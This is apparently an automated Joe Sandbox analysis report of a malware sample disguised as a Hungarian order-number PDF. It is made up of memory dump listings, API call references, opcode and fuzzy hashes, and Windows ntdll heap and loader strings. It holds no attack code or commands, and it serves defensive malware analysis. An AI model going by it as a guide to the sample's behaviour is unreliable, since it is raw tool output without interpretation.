                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: f4b57fc440ab14c901d1c91339cc5f84c636162336d2534112105df77bec41ce
                                              • Instruction ID: e29740e0b0d246b7708236b72c4b99bb879a99ba026a0df3c060dfd5b6777852
                                              • Opcode Fuzzy Hash: f4b57fc440ab14c901d1c91339cc5f84c636162336d2534112105df77bec41ce
                                              • Instruction Fuzzy Hash: E831E7B6540641DFDB009F7AF945A6B77F8FB4AB20B09465AE840F7250E738E912C723
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                              • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                              • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                              • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                              Execution Graph

                                              Execution Coverage:0%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:1
                                              Total number of Limit Nodes:0
                                              execution_graph 78164 335a2b60 LdrInitializeThunk

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3 335a35c0-335a35cc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ec4ed70d395ee0762cfc092da7d17072d0c7405b53c38aede26f6f4cf6e9a7f2
                                              • Instruction ID: ee6728bbf708afd8339a1a952a7767c0d1dcc2ef6fc49a56c8873da56dc3831b
                                              • Opcode Fuzzy Hash: ec4ed70d395ee0762cfc092da7d17072d0c7405b53c38aede26f6f4cf6e9a7f2
                                              • Instruction Fuzzy Hash: E990023170554842D50071585914706105547D0212F69D412A4425528D87958A5569A2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 335a2b60-335a2b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 05227b08d0cbaee0d7978bc42b3a159b6ce1293f493d588d407623f1efc16341
                                              • Instruction ID: a40c2ca9967744ff22f89299eb6d13f17787fd5406bdde07349534fdae79c2b9
                                              • Opcode Fuzzy Hash: 05227b08d0cbaee0d7978bc42b3a159b6ce1293f493d588d407623f1efc16341
                                              • Instruction Fuzzy Hash: 1190026130244443850571585814616405A47E0212B59D022E5015550DC52589956525

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2 335a2df0-335a2dfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 01d1d1febba8512f4172883fb2f2abe162a26b3e36669463897334d3ba074d91
                                              • Instruction ID: a4873adbbdc365f30b643f47dd3063ad9e3cdf9701a06724cbb53326d4cca643
                                              • Opcode Fuzzy Hash: 01d1d1febba8512f4172883fb2f2abe162a26b3e36669463897334d3ba074d91
                                              • Instruction Fuzzy Hash: BF90023130144853D51171585904707005947D0252F99D413A4425518D96568A56A521

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1 335a2c70-335a2c7c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ddb98e1962824f8d35c402870e4e9d19467116cc21e63a5bffddb51c0d1a18e7
                                              • Instruction ID: d05ce4af98d4d1bca455bf0bd4a8f9d51ec7576ec0e0fff43483b59b8e1cf17a
                                              • Opcode Fuzzy Hash: ddb98e1962824f8d35c402870e4e9d19467116cc21e63a5bffddb51c0d1a18e7
                                              • Instruction Fuzzy Hash: 179002313014CC42D5107158980474A005547D0312F5DD412A8425618D869589957521

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $ $0
                                              • API String ID: 3446177414-3352262554

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 3446177414-1700792311
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/X3$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                              • API String ID: 0-4130910089
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                              • API String ID: 3446177414-1745908468
                                              Similarity
                                              • API ID:
                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                              • API String ID: 0-3591852110
                                              Strings
                                              • @, xrefs: 3355D0FD
                                              • H/X3, xrefs: 335BA843
                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3355D146
                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3355D262
                                              • @, xrefs: 3355D313
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3355D2C3
                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3355D0CF
                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 3355D196
                                              • @, xrefs: 3355D2AF
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/X3$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                              • API String ID: 0-1132181190
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3570731704
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3358D959
                                                • Part of subcall function 33564859: RtlDebugPrintTimes.NTDLL ref: 335648F7
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1975516107
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                              • API String ID: 3446177414-3224558752
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                              • API String ID: 3446177414-1222099010
                                              Similarity
                                              • API ID:
                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                              • API String ID: 0-3063724069
                                              Similarity
                                              • API ID:
                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-523794902
                                              Similarity
                                              • API ID:
                                              • String ID: H/X3$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-2955536759
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-122214566
                                              Similarity
                                              • API ID:
                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-4253913091
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 335D031E
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 335D02E7
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 335D02BD
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              APIs
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: This is located in the %s field of the heap header.$ -U3`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                              • API String ID: 0-4160333617
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                              • API String ID: 0-3061284088
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\US3
                                              • API String ID: 0-4212131675
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\US3${
                                              • API String ID: 0-3654656869
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                              • API String ID: 0-2586055223
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                              • API String ID: 0-1391187441
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: @$BuildLabEx$EY3$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 0-1376963708
                                              APIs
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                              • API String ID: 0-1168191160
                                              Strings
                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33561728
                                              • HEAP: , xrefs: 33561596
                                              • HEAP[%wZ]: , xrefs: 33561712
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                              • API String ID: 0-2391371766
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                              • API String ID: 0-1146358195
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                              • API String ID: 0-318774311
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                              • API String ID: 0-3870751728
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: %$&$@
                                              • API String ID: 0-1537733988
                                              Strings
                                              • GlobalizationUserSettings, xrefs: 3363B834
                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3363B82A
                                              • TargetNtPath, xrefs: 3363B82F
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                              • API String ID: 0-505981995
                                              Strings
                                              • HEAP: , xrefs: 335BE6B3
                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 335BE6C6
                                              • HEAP[%wZ]: , xrefs: 335BE6A6
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                              • API String ID: 0-1340214556
                                              Strings
                                              • LdrpCompleteMapModule, xrefs: 335CA590
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 335CA589
                                              • minkernel\ntdll\ldrmap.c, xrefs: 335CA59A
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              Strings
                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3360DC32
                                              • HEAP: , xrefs: 3360DC1F
                                              • HEAP[%wZ]: , xrefs: 3360DC12
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                              • API String ID: 0-3815128232
                                              Strings
                                              • HEAP: , xrefs: 335BFB58
                                              • HEAP[%wZ]: , xrefs: 335BFB4B
                                              • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 335BFB63
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                              • API String ID: 0-1596344177
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                              • API String ID: 0-1151232445
                                              Strings
                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 335D1B39
                                              • LdrpAllocateTls, xrefs: 335D1B40
                                              • minkernel\ntdll\ldrtls.c, xrefs: 335D1B4A
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-4274184382
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-964947082
                                              Strings
                                              • Actx , xrefs: 335933AC
                                              • SXS: %s() passed the empty activation context data, xrefs: 335D29FE
                                              • RtlCreateActivationContext, xrefs: 335D29F9
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                              • API String ID: 0-859632880
                                              Strings
                                              • GlobalFlag, xrefs: 335EB68F
                                              • @, xrefs: 335EB670
                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 335EB632
                                              Similarity
                                              • API ID:
                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                              • API String ID: 0-4192008846
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                              • API String ID: 0-1050206962
                                              Strings
                                              • DLL "%wZ" has TLS information at %p, xrefs: 335D1A40
                                              • minkernel\ntdll\ldrtls.c, xrefs: 335D1A51
                                              • LdrpInitializeTls, xrefs: 335D1A47
                                              Similarity
                                              • API ID:
                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-931879808
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: RtlValidateHeap
                                              • API String ID: 3446177414-1797218451
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: kLsE
                                              • API String ID: 3446177414-3058123920
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: @$@
                                              • API String ID: 0-149943524
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @$AddD
                                              • API String ID: 0-2525844869
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$
                                              • API String ID: 3446177414-233714265
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                              • API String ID: 0-118005554
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: .Local\$@
                                              • API String ID: 0-380025441
                                              Strings
                                              • RtlpInitializeAssemblyStorageMap, xrefs: 335D2A90
                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 335D2A95
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                              • API String ID: 0-2653619699
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @[e3@[e3
                                              • API String ID: 0-2406652910
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              Similarity
                                              • API ID:
                                              • String ID: PreferredUILanguages
                                              • API String ID: 0-1884656846
                                              Similarity
                                              • API ID:
                                              • String ID: verifier.dll
                                              • API String ID: 0-3265496382
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              Similarity
                                              • API ID:
                                              • String ID: ge3
                                              • API String ID: 0-3248300583
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              Similarity
                                              • API ID:
                                              • String ID: LdrCreateEnclave
                                              • API String ID: 0-3262589265
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bf8327110a316e0f535f213742021eca0559ac3304742842b9097e69346ca6f
                                              • Instruction ID: 7d571d42d253d12a27cf77fe55041ae212c0898099c38f2bd9ac224de45b126d
                                              • Opcode Fuzzy Hash: 6bf8327110a316e0f535f213742021eca0559ac3304742842b9097e69346ca6f
                                              • Instruction Fuzzy Hash: 07612375A047428FE301CF64C990B6ABBE0BFC0354F1A046CE885CB681DB75E816CF92
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4da31df81f225bfe93c634019b11abc4dd2b1bc21df3eb6152118bbdf263b6e
                                              • Instruction ID: 06a7f86aff3219b94843d52e585aca62d847c10e55c9008dda683f1c130fc4ae
                                              • Opcode Fuzzy Hash: f4da31df81f225bfe93c634019b11abc4dd2b1bc21df3eb6152118bbdf263b6e
                                              • Instruction Fuzzy Hash: 1E6189B5E027559FEB05CFA8E480B8DBBB0BF48724F05812AE858AB751D734A941CB90
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd09e860182b932ad12bf12400e422fdee582df0e2b77dce59c153313493eff0
                                              • Instruction ID: 4ca6b1aab56e925283b01d01fd4667877eb1144d109a672917fb2cf846859479
                                              • Opcode Fuzzy Hash: fd09e860182b932ad12bf12400e422fdee582df0e2b77dce59c153313493eff0
                                              • Instruction Fuzzy Hash: 09412571600700EFF7259F25E884B1A77B9EF84760FA5447AF54AEB690EB70E841CB90
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c093eb9543944663f018fbb6dc4797d231b97c280ca491281bc4a58549609d4
